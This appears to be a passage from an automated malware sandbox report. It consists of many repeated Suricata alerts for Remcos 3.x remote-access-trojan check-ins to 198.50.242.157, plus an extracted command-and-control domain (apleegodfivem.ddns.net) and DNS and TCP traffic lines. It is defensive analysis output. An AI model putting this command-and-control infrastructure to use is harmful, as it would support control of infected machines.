                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50256 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50285 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50281 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49881 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49995 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50279 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50062 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49912 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50259 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50261 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49932 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50006 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50336 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50255 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49898 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50123 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50348 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50238 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50260 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50125 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50350 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49899 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50239 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50357 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50326 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50059 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50276 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50197 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50216 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50244 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50311 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50041 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50069 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50214 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50207 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50180 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50074 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50154 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50301 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50078 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50284 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50226 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50222 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50101 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50233 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50314 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50092 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50144 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50086 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50096 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50271 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50384 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50289 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50294 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50104 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50267 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50171 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50174 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50296 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50016 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50143 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50324 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50213 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50381 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50327 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50243 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50245 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50217 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49933 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50292 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50383 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50097 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50365 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50286 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50328 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49967 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49857 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50389 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50031 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50330 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50419 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50232 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50105 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50224 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50345 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50234 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50064 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50295 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49986 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50340 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50432 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50137 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50287 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50351 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50380 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50372 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50129 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50424 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50247 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50364 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50452 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50272 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50373 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50390 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50393 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50320 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50334 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50461 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50469 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50470 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50467 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50464 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50463 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50423 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50321 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49939 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50342 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50485 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49968 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50465 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50491 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50047 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50448 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50048 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50359 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50266 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50398 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50141 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50367 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50366 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50091 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50426 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49993 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50401 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50376 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50507 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50158 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50169 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50146 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50313 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50161 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50406 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50385 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50347 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50218 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50109 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50221 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49928 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50182 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50429 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50516 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50149 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50298 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50310 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50322 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50205 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50094 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50073 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50156 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50388 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50312 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50193 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50449 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50363 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50309 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50416 -> 198.50.242.157:443
                  Source: Malware configuration extractorURLs: apleegodfivem.ddns.net
                  Source: Malware configuration extractorIPs: 198.50.242.157
                  Source: unknownDNS query: name: apleegodfivem.ddns.net
                  Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
